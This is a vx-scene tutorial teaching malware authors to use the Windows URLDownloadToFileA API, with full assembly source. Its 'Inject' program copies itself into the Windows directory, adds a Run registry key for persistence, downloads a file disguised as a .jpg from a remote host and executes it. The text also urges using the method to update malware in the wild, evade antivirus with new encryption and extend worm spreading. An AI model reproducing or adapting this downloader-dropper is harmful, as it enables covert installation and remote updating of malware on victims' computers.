Up to Date with the URLDownloadToFileA API    [by DiA]

  

                           Up to Date with the URLDownloadToFileA API
                                       by DiA[rRlf] (c)04
                                www.vx-dia.de.vu  -  DiA@rrlf.de
                           __________________________________________



:disclaimer
I am NOT responsible for any damage that you do! If you use this code, you (and only you)
are responsible for executable files. Have fun with this...



:index_______________________
| 1. Intro                   |
| 2. The API                 |
| 3. Short Example           |
| 4. Usage Examples, theorie |
| 5. Injection Example       |
| 6. Outjection Example      |
| 7. Outro                   |
|____________________________|



:1. Intro
Hello again, today I want to show you a method to download a file from the internet (http)
to the local machine. It's very easy with the URLDownloadToFileA API, but this API is not
much commented. So I resulute to write this tutorial. I hope with this codes you are Up to
Date =). Have fun...



:2. The API
First of all I must say that I test this only on Windows98SE OS! But I think on other Win
OS's it works too.
The API stores in a DLL stored in Windows\System directory. On my machine it is in
C:\Windows\System\urlmon.dll . Urlmon is the name of the DLL. We only must load this library
to handle with the URLDownloadToFileA API. Look at the Short Example to see how to handle
with .dll's. Now I want to give you a short overview to the URLDownloadToFileA API:

push 0                  ;lpfnCB -> No idea ;) not interessting, simple push a 0
push 0                  ;dwReserved -> every time push a 0
push offset szFileName  ;full path of local file eG "C:\DownloadedFile.exe"
push offset szURL       ;full URL of file to download eG "http://server.cz/DownloadThis.exe
push 0                  ;pCaller -> simply push a 0
call URLDownloadToFileA ;call the api, get it from DLL

Ok, now I show you how to handle with a DLL file, and get a API call, and the how to
download a file from a URL to local machine. Let's do this...



:3. Short Example
;-----cut-----URLtoFILE.asm-----------------------------------------------------------------
; compiling:
;  TASM32 /z /ml /m3 URLtoFILE,,;
;  TLINK32 -Tpe -c -aa URLtoFILE,URLtoFILE,, import32.lib

.386
.model flat
jumps

extrn LoadLibraryA	:PROC		;to handle with the urlmon.dll
extrn GetProcAddress	:PROC		;to find the API in this DLL
extrn ExitProcess	:PROC		;to quit program
extrn MessageBoxA	:PROC		;to show a short information

.data
szDLL		db 'C:\Windows\System\urlmon.dll',0	;full path to the urlmon DLL
szAPI		db 'URLDownloadToFileA',0		;name of API to find

szURL		db 'http://home.arcor.de/vx-dia/news.html',0	;the complete url, with
								;extension of file!
szFileName	db 'C:\DiA_news.html',0	;complete path, the program download now to this
					;path on local machine

oMsg		db 'File download complete!',10,13		;only a information msg
		db 'The file is now in C:\DiA_news.html',10,13
		db '...downloaded from http://home.arcor.de/vx-dia/news.html',10,13
		db 'with the API URLDownloadToFileA from the URLmon DLL',0

.code
start:

push offset szDLL			;get DLL to handle with it
call LoadLibraryA			;handle is now in eax

push offset szAPI			;search this API address
push eax				;handle of urlmon.dll
call GetProcAddress			;address now in eax

push 0					;see "The API"
push 0
push offset szFileName			;full path of file (local)
push offset szURL			;full URL of file (http)
push 0
call eax				;call URLDownloadToFileA

push 0					;Information message
push offset szAPI
push offset oMsg
push 0
call MessageBoxA

push 0
call ExitProcess			;quit program

end start
;-----cut-----URLtoFILE.asm-----------------------------------------------------------------



:4. Usage Examples, theorie
You can do a lot of things, and the greatest is that you can everytime upload a other
executable file to your (or other) server. Here are some Usage Examples, I think that would
be kewl:

- Update your malware
   You found a bug in your code, but your shitty malware is in the wild?! No problemo,
   simply write a update program, that fix or overwrites your buggy code. If your update
   program has a bug too...who cares, write a new one, and upload it.

- New Encryption
   AV's detected your encrypted virus? Write a new engine and update it. AV's wouldn't
   detect this new encryption method.

- New Spreading Technics
   You have write a kewl worm, but it stuck on spreading? Write new Spreading methods, and
   Update this Worm. Maybe new E-Mail Spreading, or new way's to generate/found Mail
   addresses.

- New Strings
   You do a P2P, MassMailer ... and all knows your fake names? Write new Names, Subjects,
   Bodys or Attachments and update your Worm.

- Desinfect the Sytem
   Microsoft, CIA, FBI, LKA and Police is hunting you, bacauze your creation is spreading as
   Hell? Write a desinfect program for your Virus/Worm, upload it and the Virus/Worm will
   remove itself. This Method I show in the next two parts.



:5. Injection Example
;-----cut-----Inject.asm--------------------------------------------------------------------
; compiling:
;  TASM32 /z /ml /m3 Inject,,;
;  TLINK32 -Tpe -c -aa Inject,Inject,, import32.lib

.386
.model flat
jumps

extrn GetCommandLineA		:PROC
extrn lstrcpyA			:PROC
extrn GetWindowsDirectoryA	:PROC
extrn lstrcatA			:PROC
extrn CopyFileA			:PROC
extrn RegOpenKeyExA		:PROC
extrn RegSetValueExA		:PROC
extrn RegCloseKey		:PROC
extrn LoadLibraryA		:PROC
extrn GetProcAddress		:PROC
extrn CreateProcessA		:PROC
extrn ExitProcess		:PROC

.data

ThisFile	db 260d dup (0)				;save the commandline

WindowsDir	db 260d dup (?)				;save here the windows path
InjectFile	db '\Inject.exe',0			;after join this 2 strings:
							; C:\Windows\Inject.exe

StartupKey	db 'Software\Microsoft\Windows\CurrentVersion\Run',0   ;to start
							;Inject.exe every System start
StartupName	db 'URLtoFILE_Inject',0			;value name
							;value is "C:\Windows\Inject.exe
RegHandle	dd 0					;to handle with the registry

URLDownloadToFileA dd ?					;save here address of function

InjectDLL	db '\System\urlmon.dll',0		;join with windows directory
InjectFunction	db 'URLDownloadToFileA',0		;search for this function in the dll

InjectURL	db 'http://home.arcor.de/vx-dia/DiA.jpg',0   ;load this file from the i-net
InjectSaveAs	db '\DiA.exe',0				;save (rename) as DiA.exe in the
							;Windows directory


Crap		dd 4 dup (?)				;only for CreateProcess


.code
Inject:

call GetCommandLineA					;looks like "C:\Argh.exe" with "

inc eax							;remove first "
push eax						;copy commandline to
push offset ThisFile					;a string
call lstrcpyA

mov esi, offset ThisFile				;call GetPoint function t
call GetPoint						;remove last "
mov dword ptr [esi+4],0					;erase

push 260d						;size
push offset WindowsDir					;save there
call GetWindowsDirectoryA

push offset InjectFile					;join WindowsDir + Filename
push offset WindowsDir					; C:\Windows\Inject.exe
call lstrcatA						;the API to join 2 strings

push 0							;copy ever
push offset WindowsDir					;copy this file to
push offset ThisFile					;the windows directory
call CopyFileA						;copy it

push offset RegHandle					;save there the handle
push 001F0000h						;read and write to registry
push 0
push offset StartupKey					;Run
push 80000002h						;HKEY_LOCAL_MACHINE
call RegOpenKeyExA					;open key

push 260d						;size
push offset WindowsDir					; C:\Windows\Inject.exe
push 1							;string
push 0
push offset StartupName					;value name
push dword ptr [RegHandle]				;saved handle
call RegSetValueExA

push dword ptr [RegHandle]
call RegCloseKey					;close handle

push 260d						;size
push offset WindowsDir					;save there
call GetWindowsDirectoryA

push offset InjectDLL					;join WindowsDir + DLL Filename
push offset WindowsDir					; C:\Windows\System\urlmon.dll
call lstrcatA

push offset WindowsDir					;load library
call LoadLibraryA					;to get API

push offset InjectFunction				;function to search
push eax						;library handle
call GetProcAddress					;now in eax
mov URLDownloadToFileA, eax				;save address of function

push 260d						;size
push offset WindowsDir					;save there
call GetWindowsDirectoryA

push offset InjectSaveAs				;join WindowsDir + downloaded code
push offset WindowsDir					; C:\Windows\DiA.exe
call lstrcatA

push 0
push 0
push offset WindowsDir					;save local as "DiA.exe"
push offset InjectURL					;get file from this address
push 0
call URLDownloadToFileA					;call URLDownloadToFileA

push offset Crap					;execute downloaded file
push offset Crap
push 0
push 0
push 10h						;create new process
push 0
push 0
push 0
push offset WindowsDir					;first downloaded...
push offset WindowsDir					;...and then executed - DiA.exe
call CreateProcessA

push 0
call ExitProcess					;the end


GetPoint:						;the good old procedure
cmp byte ptr [esi],'.'					;is byte a '.'
jz FoundPoint						;if yes, return
inc esi							;if not, inc esi
jmp GetPoint						;search again
FoundPoint:						;label
ret							;return

end Inject
;-----cut-----Inject.asm--------------------------------------------------------------------



:6. Outjection Example
;-----cut-----Outject.asm-------------------------------------------------------------------
; compiling:
;  TASM32 /z /ml /m3 Inject,,;
;  TLINK32 -Tpe -c -aa Inject,Inject,, import32.lib

.386
.model flat
jumps

extrn RegOpenKeyExA		:PROC
extrn RegDeleteValueA		:PROC
extrn RegCloseKey		:PROC
extrn GetWindowsDirectoryA	:PROC
extrn SetCurrentDirectoryA	:PROC
extrn DeleteFileA		:PROC
extrn MessageBoxA		:PROC
extrn ExitProcess		:PROC

.data

StartupKey	db 'Software\Microsoft\Windows\CurrentVersion\Run',0
StartupName	db 'URLtoFILE_Inject',0			;delete this value

RegHandle	dd 0					;handle of registry key

WindowsDir	db 260d dup (?)				;save here windows directory

DiAFile		db 'DiA.exe',0				;to delete this file
InjectFile	db 'Inject.exe',0			;delete this too

oTitle		db 'System is now clean',0
oMsg		db '- Registry Startup Value deleted',10,13
		db '- Inject.exe deleted',10,13
		db '- DiA.exe (this file) deleted',10,13,10,13
		db 'by DiA[rRlf] (c)04 GermanY - www.vx-dia.de.vu',0

.code
Outject:

push 0
push offset oTitle
push offset oMsg
push 0
call MessageBoxA

push offset RegHandle					;save here the handle
push 001F0000h						;read and write
push 0
push offset StartupKey					;Run
push 80000002h						;HKEY_LOCAL_MACHINE
call RegOpenKeyExA					;open key

push offset StartupName					;delete this
push dword ptr [RegHandle]				;get handle
call RegDeleteValueA

push dword ptr [RegHandle]
call RegCloseKey					;close this handle

push 260d						;size
push offset WindowsDir					;save there
call GetWindowsDirectoryA

push offset WindowsDir					;eG C:\Windows
call SetCurrentDirectoryA				;cd

push offset InjectFile
call DeleteFileA					;delete Inject.exe

push offset DiAFile					;delete DiA.exe
call DeleteFileA

push 0
call ExitProcess					;exit

end Outject
;-----cut-----Outject.asm-------------------------------------------------------------------



:7. Outro
With this API it's in your hand what your malware does! You have the full control (pseudo
remote control ;) - prc =)) for it. You can update it to the perfection of it self, and if
your creation is too hot, and infect's all but you don't want that, simple write a small
desinfection application. I hope you learned from this tutorial, and if you has comments,
bugs, greetz, fucks.. please mail to DiA@rrlf.de
OK ppl, we see us in the next tutorial, have a lot of fun-time, don't drink too much ;)
bye, DiA[rRlf]
                                                                                  07.06.04